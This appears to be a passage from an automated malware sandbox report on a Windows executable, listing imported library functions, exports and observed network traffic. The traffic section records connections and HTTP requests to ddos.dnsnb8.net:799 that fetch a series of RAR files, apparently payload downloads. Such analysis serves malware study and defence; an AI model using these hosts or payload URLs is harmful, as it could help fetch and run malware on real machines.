0xd83f20 DefFrameProcW
0xd83f24 DefMDIChildProcW
0xd83f2c SubtractRect
0xd83f30 SendNotifyMessageW
0xd83f34 MonitorFromRect
0xd83f38 InSendMessage
0xd83f3c CreateMenu
0xd83f40 WindowFromDC
0xd83f44 GetWindowRgn
0xd83f48 DestroyCursor
0xd83f4c GetDCEx
0xd83f54 RemovePropW
0xd83f58 GetPropW
0xd83f5c SetPropW
0xd83f60 ShowScrollBar
0xd83f64 GetScrollRange
0xd83f68 SetScrollRange
0xd83f6c ScrollWindow
0xd83f70 RedrawWindow
0xd83f74 ValidateRect
0xd83f78 EndPaint
0xd83f7c BeginPaint
0xd83f80 SetForegroundWindow
0xd83f84 GetForegroundWindow
0xd83f88 SetActiveWindow
0xd83f8c UpdateWindow
0xd83f90 GetMenuStringW
0xd83f94 TrackPopupMenuEx
0xd83f98 TrackPopupMenu
0xd83f9c SetMenu
0xd83fa0 GetMenu
0xd83fa4 GetCapture
0xd83fa8 GetDlgCtrlID
0xd83fac GetDlgItem
0xd83fb0 IsIconic
0xd83fb4 IsWindowVisible
0xd83fb8 EndDeferWindowPos
0xd83fbc DeferWindowPos
0xd83fc0 BeginDeferWindowPos
0xd83fc4 SetWindowPlacement
0xd83fc8 GetWindowPlacement
0xd83fcc SetWindowPos
0xd83fd0 DestroyWindow
0xd83fd4 IsChild
0xd83fd8 IsMenu
0xd83fdc CreateWindowExW
0xd83fe0 GetClassInfoExW
0xd83fe4 GetClassInfoW
0xd83fe8 RegisterClassW
0xd83fec CallWindowProcW
0xd83ff0 DefWindowProcW
0xd83ff4 PeekMessageW
0xd83ff8 DispatchMessageW
0xd84000 SetMenuItemInfoW
0xd84008 SetMenuItemBitmaps
0xd8400c EnableMenuItem
0xd84010 CheckMenuItem
0xd84014 GetMenuState
0xd84018 GetSubMenu
0xd8401c GetMenuItemID
0xd84020 SendMessageW
0xd84024 UnregisterClassW
0xd84028 EnableWindow
0xd8402c PostMessageW
0xd84030 GetParent
0xd84034 MessageBoxW
0xd84038 GetKeyState
0xd8403c GetDC
0xd84040 ReleaseDC
0xd84044 LoadBitmapW
0xd84048 GetFocus
0xd8404c OffsetRect
0xd84050 SetRectEmpty
0xd84054 GetClientRect
0xd84058 SendDlgItemMessageA
0xd8405c GetWindow
0xd84060 GetWindowLongW
0xd84068 GetWindowTextW
0xd8406c GetScrollPos
0xd84070 SetScrollPos
0xd84074 SetFocus
0xd84078 RemoveMenu
0xd8407c AppendMenuW
0xd84080 InsertMenuW
0xd84084 GetMenuItemCount
0xd84088 GetCaretPos
0xd8408c GetCursorPos
0xd84090 GetInputState
0xd84094 GetMessageTime
0xd84098 GetMessagePos
0xd8409c GetSystemMetrics
0xd840a0 SendMessageTimeoutW
0xd840a4 IsWindow
0xd840a8 UnregisterClassA
0xd840b0 LoadIconW
0xd840b4 EnableScrollBar
Library GDI32.dll:
0xd83164 CreateHatchBrush
0xd83168 CreatePen
0xd8316c CreatePatternBrush
0xd83170 CreateRectRgn
0xd83174 CreateSolidBrush
0xd83178 DeleteObject
0xd8317c Escape
0xd83180 ExcludeClipRect
0xd83184 GetClipBox
0xd83188 GetClipRgn
0xd83190 GetObjectType
0xd83194 GetPixel
0xd83198 GetStockObject
0xd8319c GetViewportExtEx
0xd831a0 GetWindowExtEx
0xd831a4 IntersectClipRect
0xd831a8 LineTo
0xd831ac OffsetClipRgn
0xd831b0 PlayMetaFile
0xd831b4 PtVisible
0xd831b8 RectVisible
0xd831bc BitBlt
0xd831c0 SaveDC
0xd831c8 ExtSelectClipRgn
0xd831cc SelectObject
0xd831d0 SelectPalette
0xd831d4 SetBkMode
0xd831d8 SetMapperFlags
0xd831dc SetGraphicsMode
0xd831e0 SetMapMode
0xd831e4 SetLayout
0xd831e8 GetLayout
0xd831ec SetPolyFillMode
0xd831f0 SetROP2
0xd831f4 SetStretchBltMode
0xd831fc SetTextAlign
0xd83204 PlayMetaFileRecord
0xd83208 EnumMetaFile
0xd8320c SetWorldTransform
0xd83214 SetColorAdjustment
0xd83218 StartDocW
0xd8321c ArcTo
0xd83220 PolyDraw
0xd83224 SelectClipPath
0xd83228 SelectClipRgn
0xd8322c CreateCompatibleDC
0xd83230 SetArcDirection
0xd83234 ExtCreatePen
0xd83238 MoveToEx
0xd8323c PatBlt
0xd83244 GetObjectW
0xd83248 SetTextColor
0xd8324c SetBkColor
0xd83250 CreateBitmap
0xd83254 DeleteDC
0xd83258 CreateDCW
0xd8325c Ellipse
0xd83260 GetTextColor
0xd83264 CreatePolygonRgn
0xd83268 Polygon
0xd8326c Polyline
0xd83270 CreateRoundRectRgn
0xd83274 LPtoDP
0xd83278 Rectangle
0xd8327c GetRgnBox
0xd83280 OffsetRgn
0xd83284 GetCurrentObject
0xd83288 CreateFontW
0xd8328c GetCharWidthW
0xd83290 StretchDIBits
0xd83294 RoundRect
0xd83298 FillRgn
0xd8329c FrameRgn
0xd832a0 GetBoundsRect
0xd832a4 PtInRegion
0xd832a8 ExtFloodFill
0xd832ac SetPaletteEntries
0xd832b0 SetPixelV
0xd832b4 GetWindowOrgEx
0xd832b8 GetViewportOrgEx
0xd832bc CloseMetaFile
0xd832c0 CreateMetaFileW
0xd832c4 DeleteMetaFile
0xd832c8 EndDoc
0xd832cc StartPage
0xd832d0 EndPage
0xd832d4 AbortDoc
0xd832d8 SetAbortProc
0xd832dc GetROP2
0xd832e0 GetBkMode
0xd832e4 GetNearestColor
0xd832e8 GetPolyFillMode
0xd832ec GetStretchBltMode
0xd832f0 GetTextAlign
0xd832f4 GetTextFaceW
0xd832f8 RestoreDC
0xd832fc TextOutW
0xd83300 ExtTextOutW
0xd83304 PolyBezierTo
0xd83308 PolylineTo
0xd8330c SetViewportExtEx
0xd83310 SetViewportOrgEx
0xd83314 SetWindowExtEx
0xd83318 SetWindowOrgEx
0xd8331c OffsetViewportOrgEx
0xd83320 OffsetWindowOrgEx
0xd83324 ScaleViewportExtEx
0xd83328 ScaleWindowExtEx
0xd83330 GetDeviceCaps
0xd83334 CreateFontIndirectW
0xd83338 GetTextMetricsW
0xd8333c EnumFontFamiliesExW
0xd83340 CombineRgn
0xd83344 GetMapMode
0xd83348 SetRectRgn
0xd8334c DPtoLP
0xd83350 CreatePalette
0xd83358 CopyMetaFileW
0xd8335c GetPaletteEntries
0xd83364 RealizePalette
0xd83368 GetBkColor
0xd83370 CreateDIBitmap
0xd83374 EnumFontFamiliesW
0xd83378 GetTextCharsetInfo
0xd8337c GetDIBits
0xd83380 SetPixel
0xd83384 StretchBlt
0xd83388 CreateDIBSection
0xd8338c SetDIBColorTable
0xd83390 CreateEllipticRgn
Library SHELL32.dll:
0xd83bf4 DragQueryFileW
0xd83bf8 SHGetDesktopFolder
0xd83bfc SHGetMalloc
0xd83c00 SHGetFileInfoW
0xd83c04 ExtractIconW
0xd83c08 SHAddToRecentDocs
0xd83c10 DragFinish
0xd83c14 SHAppBarMessage
0xd83c18 ShellExecuteW
0xd83c1c CommandLineToArgvW
0xd83c20 ShellExecuteExW
0xd83c24 SHBrowseForFolderW
Library ole32.dll:
0xd844a4 CreateItemMoniker
0xd844a8 WriteClassStm
0xd844ac OleCreate
0xd844b0 OleCreateFromData
0xd844bc OleCreateLinkToFile
0xd844c0 OleCreateFromFile
0xd844c4 OleLoad
0xd844c8 OleSave
0xd844cc OleSaveToStream
0xd844d4 OleGetIconOfClass
0xd844dc OleRun
0xd844ec OleIsRunning
0xd844f0 CoGetMalloc
0xd844f4 OleRegEnumVerbs
0xd84500 OleInitialize
0xd84504 OleUninitialize
0xd84508 CoGetClassObject
0xd84510 CoRevokeClassObject
0xd84518 CLSIDFromProgID
0xd8451c OleRegGetMiscStatus
0xd84520 IsAccelerator
0xd8452c StringFromGUID2
0xd84534 CreateFileMoniker
0xd84538 StgIsStorageFile
0xd84540 StgOpenStorage
0xd84544 StgCreateDocfile
0xd84548 CoCreateInstance
0xd8454c CoCreateGuid
0xd84550 SetConvertStg
0xd84554 OleRegGetUserType
0xd84558 ReleaseStgMedium
0xd8455c OleDuplicateData
0xd84560 ReadFmtUserTypeStg
0xd84564 WriteFmtUserTypeStg
0xd84568 WriteClassStg
0xd8456c ReadClassStg
0xd84570 CreateBindCtx
0xd84574 CoTreatAsClass
0xd84578 CoTaskMemAlloc
0xd8457c StringFromCLSID
0xd84580 OleLockRunning
0xd84588 PropVariantCopy
0xd8458c RevokeDragDrop
0xd84590 RegisterDragDrop
0xd84598 OleGetClipboard
0xd8459c DoDragDrop
0xd845a4 OleFlushClipboard
0xd845a8 OleSetClipboard
0xd845b0 CLSIDFromString
0xd845b8 CoDisconnectObject
0xd845bc CoInitializeEx
0xd845c0 CoUninitialize
0xd845c4 CoInitialize
0xd845cc CoTaskMemFree
Library OLEAUT32.dll:
0xd83ad4 SafeArrayPutElement
0xd83ad8 SafeArrayGetElement
0xd83ae0 SafeArrayAccessData
0xd83ae4 SafeArrayUnlock
0xd83aec SafeArrayCopy
0xd83af0 SafeArrayAllocData
0xd83af4 VarCyFromStr
0xd83b00 SysStringLen
0xd83b04 SafeArrayPtrOfIndex
0xd83b08 VariantCopy
0xd83b0c VarDateFromStr
0xd83b10 SafeArrayCreate
0xd83b14 VarBstrFromCy
0xd83b18 VarBstrFromDate
0xd83b1c VarBstrFromDec
0xd83b20 VarDecFromStr
0xd83b24 SysFreeString
0xd83b2c SafeArrayDestroy
0xd83b30 SafeArrayRedim
0xd83b34 SafeArrayGetDim
0xd83b3c SafeArrayLock
0xd83b40 SafeArrayGetUBound
0xd83b44 SysReAllocStringLen
0xd83b48 RegisterTypeLib
0xd83b4c SafeArrayGetLBound
0xd83b54 LoadRegTypeLib
0xd83b58 LoadTypeLib
0xd83b5c SysAllocString
0xd83b60 VariantChangeType
0xd83b64 VariantClear
0xd83b68 VariantInit
0xd83b6c SysAllocStringLen
0xd83b74 SysStringByteLen
Library ADVAPI32.dll:
0xd83000 SetFileSecurityW
0xd83004 GetFileSecurityW
0xd83008 RegEnumKeyExW
0xd8300c RegEnumValueW
0xd83010 RegQueryValueW
0xd83014 RegEnumKeyW
0xd83018 RegDeleteKeyW
0xd8301c RegSetValueW
0xd83020 OpenThreadToken
0xd83024 GetTokenInformation
0xd83028 EqualSid
0xd83030 FreeSid
0xd83034 RegCloseKey
0xd83038 RegQueryValueExW
0xd83044 SetEntriesInAclW
0xd83048 RegCreateKeyExW
0xd8304c RegDeleteValueW
0xd83050 RegOpenKeyExW
0xd83054 RegSetValueExW
0xd83060 ReportEventW
0xd83064 GetLengthSid
0xd83068 CopySid
0xd83078 GetSecurityInfo
0xd8307c IsValidSid
0xd83084 GetSidSubAuthority
0xd8308c LookupAccountSidA
0xd83090 LookupAccountNameA
0xd83094 RegOpenKeyExA
0xd83098 RevertToSelf
0xd8309c LogonUserW
0xd830a8 DuplicateTokenEx
0xd830b0 CryptReleaseContext
0xd830b4 CryptGenRandom
0xd830b8 RegQueryValueExA
0xd830bc CryptGetHashParam
0xd830c0 CryptCreateHash
0xd830c4 CryptHashData
0xd830c8 CryptDestroyHash
0xd830cc CryptDestroyKey
0xd830d0 CryptImportKey
0xd830d4 CryptEncrypt
0xd830d8 OpenProcessToken
Library MSIMG32.dll:
0xd839ec TransparentBlt
0xd839f0 AlphaBlend
Library COMCTL32.dll:
Library UxTheme.dll:
0xd841a8 OpenThemeData
0xd841ac CloseThemeData
0xd841b0 DrawThemeBackground
0xd841b4 GetThemeColor
0xd841b8 GetCurrentThemeName
0xd841bc GetWindowTheme
0xd841c0 IsAppThemed
0xd841c8 GetThemeSysColor
0xd841cc GetThemePartSize
0xd841d0 DrawThemeText
Library oledlg.dll:
0xd84638 OleUIBusyW
Library gdiplus.dll:
0xd843f8 GdiplusShutdown
0xd843fc GdipFree
0xd84400 GdiplusStartup
0xd84404 GdipCloneImage
0xd84408 GdipDisposeImage
0xd84410 GdipGetImageWidth
0xd84414 GdipGetImageHeight
0xd8441c GdipGetImagePalette
0xd84430 GdipDrawImageRectI
0xd84438 GdipCreateFromHDC
0xd84440 GdipDrawImageI
0xd84444 GdipDeleteGraphics
0xd8444c GdipBitmapLockBits
0xd84458 GdipAlloc
Library OLEACC.dll:
0xd83aa4 LresultFromObject

Exports

Ordinal Address Name
1 0x4357b0 ?OnThrowStdException@Debug@MiKTeX@@YAXXZ
2 0x41f1cc _DllGetVersion@4

Hosts

No hosts contacted.

TCP

Source Source Port Destination (IP, resolved hostname) Destination Port
192.168.56.101 49178 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination (IP, resolved hostname where available) Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 53658 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k3.rar
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k2.rar
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k5.rar
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k4.rar
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.